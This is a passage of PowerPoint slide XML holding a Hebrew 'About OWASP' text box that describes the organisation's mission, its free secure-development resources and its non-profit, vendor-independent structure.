                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>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3494923890"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="990600"/>
          <a:ext cx="3429000" cy="7035707"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="337727">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אודות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6666577">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ארגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הינו ארגון התנדבותי אשר מטרתו לאפשר לארגונים לפתח, לרכוש, ולתחזק יישום וממשק פיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) אשר ניתן לסמוך עליהם.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ב-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ניתן להשיג בחינם:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כלים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ותקנים לפיתוח מאובטח.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ספרים שלמים בנושא בדיקות ופיתוח קוד מאובטח.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מצגות וסרטוני </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>וידאו</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מסמכי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Cheat sheets</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> במגוון תחומים.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בקרות, תקנים וספריות קוד.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>סניפים מקומיים של </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> ברחבי העולם ובישראל</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מחקרים בחזית הטכנולוגיה.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מגוון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>כנסים ברחבי העולם</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>רשימות תפוצה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>למידע נוסף: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כל הכלים של ארגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, המסמכים, סרטוני הווידאו, המצגות והסניפים הינם חופשיים ופתוחים לכל אחד המתעניין בהרחבת הידע בפיתוח מאובטח.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בנושא פיתוח מאובטח, אנו תומכים בגישה של אנשים, תהליכים ובעיות טכנולוגיות, בשל העובדה שהגישה האפקטיבית ביותר לפיתוח מאובטח דורשת שיפורים בתחומים אלו.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ארגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הינו ארגון מסוג חדש. החופש שלנו מלחץ מסחרי מאפשר לנו לספק ידע שימושי וללא דעות מוקדמות לגבי פיתוח מאובטח.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ארגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> אינו משויך לאף חברת טכנולוגיה, למרות שאנו תומכים בשימוש מושכל ביישומים טכנולוגיים מסחריים. ארגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מייצר סוגים רבים של תכנים בצורה שיתופית, שקופה ובאופן פתוח.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קרן </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הינה גוף ללא מטרות רווח המאפשרת המשכיות ארוכת טווח לפרויקט. כמעט כל אדם המשתייכת ל-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הינו מתנדב, לרבות הנהלת </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
